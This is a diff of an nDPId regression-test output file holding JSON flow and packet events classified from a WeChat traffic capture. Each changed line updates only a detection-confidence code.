-00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1367,"source":"wechat.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795095,"flow_last_seen":1492167795095,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492167795095,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50577,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
+00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1367,"source":"wechat.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795095,"flow_last_seen":1492167795095,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492167795095,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50577,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1368,"source":"wechat.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1492167795096,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1492167795096,"pkt":"AQBeAAD80CeIF3AECABFoAA4Qc0AAAER1D\/AqAFk4AAA\/NNsFOsAJPA+T9YAAAABAAAAAAAACmxiamFtd3B0eHoAAAEAAQ=="} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1369,"source":"wechat.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1492167795098,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":90,"pkt_l4_len":36,"thread_ts_msec":1492167795098,"pkt":"MzMAAQAD0CeIF3AEht1gAAAAACQRAf6AAAAAAAAAkfk983Q2bNb\/AgAAAAAAAAAAAAAAAQADxQgU6wAk8ypP1gAAAAEAAAAAAAAKbGJqYW13cHR4egAAAQAB"} 
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1370,"source":"wechat.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1492167795099,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1492167795099,"pkt":"AQBeAAD80CeIF3AECABFoAA2Qc4AAAER1EDAqAFk4AAA\/OA5FOsAIm9WRGIAAAABAAAAAAAACG1jenRtcGtjAAABAAE="} 
@@ -399,101 +397,101 @@ 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1373,"source":"wechat.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1492167795103,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":88,"pkt_l4_len":34,"thread_ts_msec":1492167795103,"pkt":"MzMAAQAD0CeIF3AEht1gAAAAACIRAf6AAAAAAAAAkfk983Q2bNb\/AgAAAAAAAAAAAAAAAQADwCsU6wAiwAT8cwAAAAEAAAAAAAAIY2Fuc2FxY3EAAAEAAQ=="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1374,"source":"wechat.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795292,"flow_last_seen":1492167795292,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1492167795292,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1374,"source":"wechat.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1492167795292,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1492167795292,"pkt":"\/\/\/\/\/\/\/\/0CeIF3AECABFoABOQdAAAIARc3vAqAFkwKgB\/wCJAIkAOgI3\/v8BEAABAAAAAAAAIEVNRUNFS0VCRU5GSEZBRkVGSUZLQ0FDQUNBQ0FDQUFBAAAgAAE="} 
-00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1374,"source":"wechat.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795292,"flow_last_seen":1492167795292,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1492167795292,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1374,"source":"wechat.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795292,"flow_last_seen":1492167795292,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1492167795292,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1375,"source":"wechat.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1492167795294,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1492167795294,"pkt":"\/\/\/\/\/\/\/\/0CeIF3AECABFoABOQdEAAIARc3rAqAFkwKgB\/wCJAIkAOgw8\/wABEAABAAAAAAAAIEVORURGS0ZFRU5GQUVMRURDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="} 
00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1376,"source":"wechat.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1492167795295,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1492167795295,"pkt":"\/\/\/\/\/\/\/\/0CeIF3AECABFoABOQdIAAIARc3nAqAFkwKgB\/wCJAIkAOio7\/wEBEAABAAAAAAAAIEVERUJFT0ZERUJGQkVERkJDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1383,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":73,"flow_first_seen":1492167639887,"flow_last_seen":1492167667658,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":39199,"flow_avg_l4_payload_len":536,"midstream":0,"thread_ts_msec":1492167796728,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1389,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1492167338426,"flow_last_seen":1492167781907,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167802662,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 
-00682{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1389,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1492167338426,"flow_last_seen":1492167781907,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167802662,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1383,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":73,"flow_first_seen":1492167639887,"flow_last_seen":1492167667658,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":39199,"flow_avg_l4_payload_len":536,"midstream":0,"thread_ts_msec":1492167796728,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1389,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1492167338426,"flow_last_seen":1492167781907,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167802662,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00682{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1389,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1492167338426,"flow_last_seen":1492167781907,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167802662,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1395,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1492167815567,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":50,"pkt_l4_len":12,"thread_ts_msec":1492167815567,"pkt":"AQBeAAAB8IQvSpdgCABGoAAkj9sAAAEC8bDAqAH+4AAAAZQEAAARZOybAAAAAAIAAAA="} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1398,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1492167820408,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1492167820408,"pkt":"AQBeAAAWeJKcD6iOCABGwAAoAABAAAECQerAqAFn4AAAFpQEAAAiAPsCAAAAAQIAAADgAAD7"} 
00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1401,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167648494,"flow_last_seen":1492167695538,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167822531,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43851,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Tencent","breed":"Acceptable","category":"SocialNetwork"}} 00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1401,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167648494,"flow_last_seen":1492167695538,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167822531,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43851,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1401,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167640138,"flow_last_seen":1492167695550,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167822531,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1401,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167640138,"flow_last_seen":1492167695550,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167822531,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1492167648277,"flow_last_seen":1492167720406,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3430,"flow_tot_l4_payload_len":7446,"flow_avg_l4_payload_len":310,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"}} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1492167695237,"flow_last_seen":1492167720429,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":12571,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1492167695488,"flow_last_seen":1492167720468,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167648243,"flow_last_seen":1492167648277,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":19041,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"}} 
-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167650311,"flow_last_seen":1492167650345,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60562,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1492167650348,"flow_last_seen":1492167650467,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":3552,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":35601,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1492167648277,"flow_last_seen":1492167720406,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3430,"flow_tot_l4_payload_len":7446,"flow_avg_l4_payload_len":310,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"}} +00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1492167695237,"flow_last_seen":1492167720429,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":12571,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1492167695488,"flow_last_seen":1492167720468,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167648243,"flow_last_seen":1492167648277,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":19041,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167650311,"flow_last_seen":1492167650345,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60562,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1492167650348,"flow_last_seen":1492167650467,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":3552,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":35601,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1416,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1492167848542,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1492167848542,"pkt":"\/\/\/\/\/\/\/\/0CeIF3AECABFoADlWmgAAIARWkzAqAFkwKgB\/wCKAIoA0eSKEQ7\/A8CoAWQAigC7AAAgRUhFSkVQRkdFQkVPRU9FSkNORkFFRENBQ0FDQUNBQ0EAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJPAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAOgDAAAAAAAAAAAhAFYAAwABAAAAAgAyAFxNQUlMU0xPVFxCUk9XU0UADwCA\/AoAR0lPVkFOTkktUEMAAAAAAAYBAxIFAA8BVaoA"} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1417,"source":"wechat.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167849769,"flow_last_seen":1492167849769,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492167849769,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1417,"source":"wechat.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1492167849769,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"thread_ts_msec":1492167849769,"pkt":"MzMAAAACuHgu4toHht1gCKryABA6\/\/6AAAAAAAAACEKj86KGbFv\/AgAAAAAAAAAAAAAAAAAChQD\/swAAAAABAbh4LuLaBw=="} 
-00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1417,"source":"wechat.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167849769,"flow_last_seen":1492167849769,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492167849769,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::2","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1417,"source":"wechat.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167849769,"flow_last_seen":1492167849769,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492167849769,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::2","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1418,"source":"wechat.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167851002,"flow_last_seen":1492167851002,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1492167851002,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
